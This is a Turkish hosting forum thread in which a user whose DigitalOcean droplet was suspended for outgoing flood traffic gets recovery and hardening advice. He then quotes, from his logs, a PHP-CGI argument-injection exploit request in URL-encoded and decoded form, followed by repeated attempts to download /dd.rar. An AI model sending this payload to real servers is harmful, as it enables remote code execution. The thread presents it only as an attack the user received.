Digitalocean Ddos Veya Flood Tan Serverı Kapatmış!

Tahribat.com Forumları
line

Domain - Hosting - Reseller - Dedicated Server - Virtual Server - IRC Shell - Seedbox
line

Digitalocean Ddos Veya Flood Tan Serverı Kapatmış!

09/Tem/15 01:33 Kısayol Şikayet Özel Mesaj

RockZs

Kayıt Tarihi: 30/Haziran/2002

by_Tet bunu yazdı

Hocam yorumun için teşekkürler kodlarımı da gözden geçiremiyorum ki komple kapatmışlar bi şekilde yedek almam gerekli

İki dk dosyalarıma erişim izni versinler sonra komple kapatsınlar önemli değil orası yani

Eğer yarın sabaha kadar cevap atmazlarsa dediğini tekrar göndereceğim

hocam şurada (https://www.digitalocean.com/community/tutorials/how-to-recover-from-a-compromised-droplet-sending-an-outgoing-flood-or-ddos) yazana göre DigOcean daki control panel deki console dan server ına erişebiliyorsun sanırım. root pass bilmen yeterli diyor.

Alıntı yap
09/Tem/15 01:34 Kısayol Şikayet Özel Mesaj

Retro
by_Tet

Kayıt Tarihi: 22/Mayıs/2012

Lightsaber bunu yazdı

hoca güzel bi şekilde yaz, kibarca, biraz da yağ çek hemen kıvama geliyorlar :D bu şekilde fazladan kupon kodu kapmıştım bir de borç sildirmiştim :D

İşin açığı

i have my mysql backup. can u open recovery mode now

Dediğime cevap atmışlar 20 dk sonra yani şimdi recovery modu açmışlar :D Ayıp olmasın diye RockZs hocamın yazdığı şeyi biraz kısaltarak yazdım teşekkür olsun diye

Bi verilerimi kurtarıyım sonrasında..... :) köprüyü geçene kadar yani

iyibu! yeniden..

Alıntı yap
09/Tem/15 01:36 Kısayol Şikayet Özel Mesaj

Retro
by_Tet

Kayıt Tarihi: 22/Mayıs/2012

RockZs bunu yazdı

by_Tet bunu yazdı

Hocam yorumun için teşekkürler kodlarımı da gözden geçiremiyorum ki komple kapatmışlar bi şekilde yedek almam gerekli

İki dk dosyalarıma erişim izni versinler sonra komple kapatsınlar önemli değil orası yani

Eğer yarın sabaha kadar cevap atmazlarsa dediğini tekrar göndereceğim

hocam şurada (https://www.digitalocean.com/community/tutorials/how-to-recover-from-a-compromised-droplet-sending-an-outgoing-flood-or-ddos) yazana göre DigOcean daki control panel deki console dan server ına erişebiliyorsun sanırım. root pass bilmen yeterli diyor.

Hocam işte konsola ulaşabiliyordum fakat step 2 yu uygulayamıyordum şimdi açmışlar yedek alacağım tekrar teşekkür ederim

Eğer yine kurtaramazsam mecburen konuyu uplarım fakat çözüldü gibi herkese teşekkürler :)

iyibu! yeniden..

Alıntı yap
09/Tem/15 01:40 Kısayol Şikayet Özel Mesaj

YekteranBaymedir

Kayıt Tarihi: 10/Temmuz/2009

şifreyi basit bir şey yaptığından bahsetmişsin.

do serverları tahminimce sürekli saldırıyo alıyor.

1- hiçbir programı default port kullanma :)

2- basit şifre kullanma

droplet'ine biri girip bot salmış olabilir içine

ben bi ara farkında olmadan mail sunucusu kurmuşum başka bişey kurarken

adamın teki benim sunucu üzerinden spam mail yolladı diye abuse yemiştim :)

Alıntı yap

09/Tem/15 01:54

Kısayol

Şikayet

Özel Mesaj

Retro
by_Tet

Kayıt Tarihi: 22/Mayıs/2012

Daft bunu yazdı

şifreyi basit bir şey yaptığından bahsetmişsin.

do serverları tahminimce sürekli saldırıyo alıyor.

1- hiçbir programı default port kullanma :)

2- basit şifre kullanma

droplet'ine biri girip bot salmış olabilir içine

ben bi ara farkında olmadan mail sunucusu kurmuşum başka bişey kurarken

adamın teki benim sunucu üzerinden spam mail yolladı diye abuse yemiştim :)

Olayı çözdüm götün teki şöyle POST göndermiş

//%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E

Decode şu şekilde

//cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -d auto_prepend_file=php://input -n

Sonra dd.rar indirmeye çalışmışlar tabi 404 vermiş çünkü sistem node.js php'ye dair hiçbirşey yok

[0mGET /dd.rar [33m404 [0m5.021 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m8.373 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m5.843 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m16.520 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m8.180 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m14.779 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m8.361 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m4.473 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m3.782 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m17.023 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m3.852 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m44.379 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m23.454 ms - 1271[0m
[0mGET /dd.rar [33m404 [0m8.575 ms - 1271[0m

Haliyle benim dropleti kapatmışlar ama benim bi suçum yok ne yani böyle saldırılar aldığımda kapatacaklar mı sonuçta zarar vermesi imkansız en azından php olarak.

iyibu! yeniden..

Alıntı yap

09/Tem/15 01:59 Kısayol Şikayet Özel Mesaj

YekteranBaymedir

Kayıt Tarihi: 10/Temmuz/2009

hacı vps'i korumak senin görevin :D

host değil ki bu

gerçi, dedicated almadığın sürece her türlü karışıyolar gene ota buka

Alıntı yap
09/Tem/15 02:03 Kısayol Şikayet Özel Mesaj

Retro
by_Tet

Kayıt Tarihi: 22/Mayıs/2012

Daft bunu yazdı

hacı vps'i korumak senin görevin :D

host değil ki bu

gerçi, dedicated almadığın sürece her türlü karışıyolar gene ota buka

Doğru diyon hocam artık tıngır mıngır düşe kalka öğrenecez yapacak bişey yok

Yazdığım sistemde 0 açık ona eminim (hatasız kod olmaz lafı biryana bırakılırsa) ama vps korumak bambaşka bişeymiş dediğin gibi. neyse öğreniriz artık :)

iyibu! yeniden..

Alıntı yap

Toplam Hit: 1725 Toplam Mesaj: 18
ddos digitalocean flood banned locked

Cevapla